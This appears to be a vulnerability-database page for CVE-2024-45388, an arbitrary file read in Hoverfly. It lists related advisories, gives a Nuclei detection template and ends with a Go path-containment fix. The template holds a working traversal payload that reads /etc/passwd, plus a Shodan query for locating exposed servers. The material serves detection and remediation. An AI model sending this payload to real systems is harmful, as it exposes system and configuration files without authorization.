| Title | Published | Views | Family |
|---|---|---|---|
| ofensive-playbook | 16 Apr 2026 16:40 | – | githubexploit |
| ffensive-playbook | 16 Apr 2026 16:40 | – | githubexploit |
| CVE-2024-45388 | 2 Sep 2024 21:24 | – | circl |
| Hoverfly security vulnerability | 2 Sep 2024 00:00 | – | cnnvd |
| CVE-2024-45388 | 2 Sep 2024 16:07 | – | cve |
| CVE-2024-45388 Arbitrary file read in the `/api/v2/simulation` endpoint in hoverfly (`GHSL-2023-274`) | 2 Sep 2024 16:07 | – | cvelist |
| Hoverfly allows an arbitrary file read in the `/api/v2/simulation` endpoint (`GHSL-2023-274`) | 3 Sep 2024 21:01 | – | github |
| CVE-2024-45388 | 2 Sep 2024 18:15 | – | nvd |
| CVE-2024-45388 Arbitrary file read in the `/api/v2/simulation` endpoint in hoverfly (`GHSL-2023-274`) | 2 Sep 2024 16:07 | – | osv |
| GHSA-6XX4-X46F-F897 Hoverfly allows an arbitrary file read in the `/api/v2/simulation` endpoint (`GHSL-2023-274`) | 3 Sep 2024 21:01 | – | osv |
```yaml
id: CVE-2024-45388

info:
  name: Hoverfly < 1.10.3 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Hoverfly is a lightweight service virtualization / API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Hoverfly server, including sensitive configuration data.
  remediation: |
    Update Hoverfly to version 1.10.3 or later.
  reference:
    - https://github.com/advisories/GHSA-6xx4-x46f-f897
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-45388
    cwe-id: CWE-20
    epss-score: 0.55864
    epss-percentile: 0.98923
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.favicon.hash:1357234275
  tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln

http:
  - raw:
      - |
        PUT /api/v2/simulation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - 'hoverflyVersion'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bde7274a86bcdfc0b2b5fb5f2f04b81fb9577deadb7345b05fbe37f9185a806102200721081e72f7a1c7f73b4f1cc8e94778aed488df569855707f02ca905d70d69f:922c64590222798bb761d5b6d8e72950
```
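The root cause described above is that the `bodyFile` value from a submitted simulation is used as a file path without being confined to a directory. As an added illustration (not Hoverfly's own code and not its 1.10.3 fix), the Go function below shows the containment check a defender would expect on that field; the base directory `/var/lib/hoverfly/responses` is an assumption, and the inputs in `main` are constructed from the traversal string in the template above plus a benign name.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned when a bodyFile value would resolve outside
// the directory that response bodies are allowed to be read from.
var ErrOutsideBase = errors.New("bodyFile resolves outside the allowed directory")

// ResolveBodyFile is a hypothetical containment check for a simulation's
// "response.bodyFile" field. It joins the user-supplied path onto baseDir
// and rejects anything that escapes it: absolute paths, "../" segments,
// or a sibling directory that merely shares baseDir as a string prefix.
func ResolveBodyFile(baseDir, bodyFile string) (string, error) {
	if bodyFile == "" {
		return "", errors.New("bodyFile is empty")
	}
	if filepath.IsAbs(bodyFile) {
		return "", ErrOutsideBase
	}
	absBase, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	// Clean collapses "a/../b" and "./" so dot segments cannot survive into
	// the comparison below.
	candidate := filepath.Clean(filepath.Join(absBase, bodyFile))
	// Rel, unlike a string prefix test, distinguishes ".../responses/x"
	// from ".../responses-evil/x".
	rel, err := filepath.Rel(absBase, candidate)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return candidate, nil
}

func main() {
	// Constructed inputs: the traversal string from the template, an absolute path, a benign name.
	for _, p := range []string{"../../../../../../../etc/passwd", "/etc/passwd", "bodies/ok.json"} {
		resolved, err := ResolveBodyFile("/var/lib/hoverfly/responses", p)
		fmt.Printf("%-36q -> %q err=%v\n", p, resolved, err)
	}
}
```

This check does not follow symlinks inside the base directory; if operators can place links there, resolve the candidate with `filepath.EvalSymlinks` and repeat the `Rel` test on the result.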